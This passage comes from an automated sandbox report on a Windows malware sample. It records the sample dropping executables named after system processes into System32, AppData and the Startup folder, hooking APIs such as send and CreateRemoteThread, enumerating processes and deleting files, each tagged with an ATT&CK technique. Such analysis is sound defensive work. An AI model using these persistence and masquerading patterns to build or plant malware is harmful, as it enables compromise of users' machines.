4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46944 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46770 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46873 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46800 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46869 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46864 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46865 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46838 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46825 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46780 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46862 bytes starting with PE header signature to file \"C:\\Windows\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46841 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46852 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46723 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46765 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46929 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46736 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46948 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46888 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46850 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46807 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46825 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46808 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46844 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46899 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46895 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46815 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46753 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46896 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"services.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"WINLOGON.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67EE4A6B.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"CSRSS.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67EE4B2F.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.EXE.67EE473F.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"MrD3_08.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67EE4741.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"lsass.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"smss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"csrss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67EE50BB.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.EXE.67EE4E8F.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-223", "type": 6, "relevance": 3, "name": "Calls an API typically used to query local/system time as file time", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FileTimeToLocalFileTime\" with parameter 30e5fef92b04ca01 & 30b587bd3c04ca01 (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FileTimeToSystemTime\" (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FileTimeToLocalFileTime\" with parameter b5c5dcf361a4db01 & b59565b772a4db01 (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FileTimeToLocalFileTime\" with parameter 57029f4c62a4db01 & 57d2271073a4db01 (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FileTimeToLocalFileTime\" with parameter db92bb4c62a4db01 & db62441073a4db01 (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FileTimeToLocalFileTime\" with parameter 0259124e62a4db01 & 02299b1173a4db01 (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FileTimeToLocalFileTime\" with parameter 67d03a4e62a4db01 & 67a0c31173a4db01 (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"FileTimeToLocalFileTime\" with parameter e855444e62a4db01 & e825cd1173a4db01 (UID: 00000000-00005884)", "origin": "API Call", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"Process32NextW with parameter lsass.exe\" (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"Process32NextW with parameter lsm.exe\" (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"Process32NextW with parameter dinotify.exe\" (UID: 00000000-00005884)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "api-284", "type": 6, "relevance": 1, "name": "Opens a handle to the specified local process", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" opens a process \"C:\\78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" opens a process \"C:\\Users\\HAPUBWS\\AppData\\Local\\IExplorer.exe\" (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" opens a process \"C:\\Windows\\System32\\dwm.exe\" (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" opens a process \"C:\\Windows\\explorer.exe\" (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" opens a process \"C:\\Windows\\System32\\taskhost.exe\" (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" opens a process \"C:\\Windows\\System32\\dinotify.exe\" (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" opens a process \"C:\\Windows\\System32\\conhost.exe\" (UID: 00000000-00005884)\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" opens a process \"C:\\Windows\\D3_08.exe\" (UID: 00000000-00005884)", "origin": "API Call", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "hooks-0", "type": 11, "relevance": 10, "name": "Hooks API calls", "description": "\"Process32NextW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"LoadLibraryExW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"CopyFileW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindResourceA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"WinExec@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"LoadResource@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"CreateProcessW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"CreateProcessA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"LoadLibraryA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"RemoveDirectoryW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"LoadLibraryExA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"GetProcAddress@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"Process32FirstW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"send@WS2_32.DLL\" in \"IExplorer.exe\"\n \"CreateToolhelp32Snapshot@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"CopyFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"GetNativeSystemInfo@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"CreateRemoteThread@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"GetLogicalDriveStringsA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"OpenMutexW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"RemoveDirectoryA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"CreateDirectoryA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"IExplorer.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" marked \"C:\\share\\D3_08\\New Folder.exe\" for deletion\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" marked \"C:\\share\\Data %OSUSER%.exe\" for deletion\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\" for deletion\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\smss.exe\" for deletion\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\winlogon.exe\" for deletion\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\services.exe\" for deletion\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\lsass.exe\" for deletion\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\SMSS.EXE\" with delete access\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\SMSS.EXE\" with delete access\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\SMSS.EXE\" with delete access\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\CSRSS.EXE\" with delete access\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\CSRSS.EXE\" with delete access\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\CSRSS.EXE\" with delete access\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\" with delete access\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\WINLOGON.EXE\" with delete access\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINLOGON.EXE\" with delete access\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\" with delete access\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\SERVICES.EXE\" with delete access\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\SERVICES.EXE\" with delete access\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\SERVICES.EXE\" with delete access\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\LSASS.EXE\" with delete access\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\LSASS.EXE\" with delete access\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\LSASS.EXE\" with delete access\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\D3_08.EXE\" with delete access\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\D3_08.EXE\" with delete access\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\D3_08.EXE\" with delete access\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\smss.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "api-31", "type": 6, "relevance": 9, "name": "Tries to access unusual system drive letters", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" touched \"K:\"\n 